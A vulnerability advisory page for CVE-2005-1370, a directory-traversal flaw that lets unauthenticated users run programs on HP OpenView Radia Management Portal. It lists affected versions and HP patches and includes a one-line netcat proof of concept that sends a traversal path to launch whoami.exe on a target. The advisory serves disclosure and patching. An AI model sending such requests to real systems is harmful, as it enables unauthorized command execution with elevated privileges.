HP OpenView Radia Management Portal Remote Command Execution Vulnerability
BID:13414
Info
HP OpenView Radia Management Portal Remote Command Execution Vulnerability
| Bugtraq ID: | 13414 |
| Class: | Access Validation Error |
| CVE: |
CVE-2005-1370 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 28 2005 12:00AM |
| Updated: | Jul 12 2009 02:06PM |
| Credit: | David Morgan and Dominic Beecher are credited with the discovery of this issue. |
| Vulnerable: |
HP Radia Management Portal 2.0 HP Radia Management Portal 1.0 |
| Not Vulnerable: | |
Discussion
HP OpenView Radia Management Portal Remote Command Execution Vulnerability
A remote command execution vulnerability affects HP OpenView Radia Management Portal. This issue is due to a failure of the application to properly secure access to critical functionality. This is due to a directory traversal issue that will permit a remote user to execute any program on the affected computer.
An unauthenticated, remote attacker may leverage this issue to execute arbitrary commands on an affected computer with Local System privileges on the Microsoft Windows platform and elevated privileges on UNIX-based platforms.
A remote command execution vulnerability affects HP OpenView Radia Management Portal. This issue is due to a failure of the application to properly secure access to critical functionality. This is due to a directory traversal issue that will permit a remote user to execute any program on the affected computer.
An unauthenticated, remote attacker may leverage this issue to execute arbitrary commands on an affected computer with Local System privileges on the Microsoft Windows platform and elevated privileges on UNIX-based platforms.
Exploit / POC
HP OpenView Radia Management Portal Remote Command Execution Vulnerability
There is no exploit required. The following example was provided using the bash shell and netcat to send a request to the vulnerable computer:
bash$ printf "\x00\x00\x00../../windows/system32/whoami.exe\x00" | nc -v
xx.xx.xx.xx 1065
There is no exploit required. The following example was provided using the bash shell and netcat to send a request to the vulnerable computer:
bash$ printf "\x00\x00\x00../../windows/system32/whoami.exe\x00" | nc -v
xx.xx.xx.xx 1065
Solution / Fix
HP OpenView Radia Management Portal Remote Command Execution Vulnerability
Solution:
HP has released security bulletin SSRT5958 dealing with this issue. HP advises all users to acquire the patches through HP Software Support Online; authentication is required to obtain the patches. Please see the referenced advisory for more information.
HP Radia Management Portal 1.0
HP Radia Management Portal 2.0
Solution:
HP has released security bulletin SSRT5958 dealing with this issue. HP advises all users to acquire the patches through HP Software Support Online; authentication is required to obtain the patches. Please see the referenced advisory for more information.
HP Radia Management Portal 1.0
-
HP RADINFRAAIX_00002 - AIX
HP OpenView Radia Management Portal (RMP)
http://support.openview.hp.com -
HP RADINFRAHPUX1_00003 - HP-UX
HP OpenView Radia Management Portal (RMP)
http://support.openview.hp.com -
HP RADINFRALNX_00001 - Linux
HP OpenView Radia Management Portal (RMP)
http://support.openview.hp.com -
HP RADINFRASOL_00002 - Solaris
HP OpenView Radia Management Portal (RMP)
http://support.openview.hp.com -
HP RADINFRAWIN32_00006 - Windows
HP OpenView Radia Management Portal (RMP)
http://support.openview.hp.com
HP Radia Management Portal 2.0
-
HP RADINFRAWIN32_00006 - Windows
HP OpenView Radia Management Portal (RMP)
http://support.openview.hp.com
References
HP OpenView Radia Management Portal Remote Command Execution Vulnerability
References:
References:
- SSRT5958 rev.0 - HP OpenView Radia Management Portal (RMP) Radia Management Agen (HP)
- HP OpenView Radia Management Agent remote command execution via directory traver (NGSSoftware Insight Security Research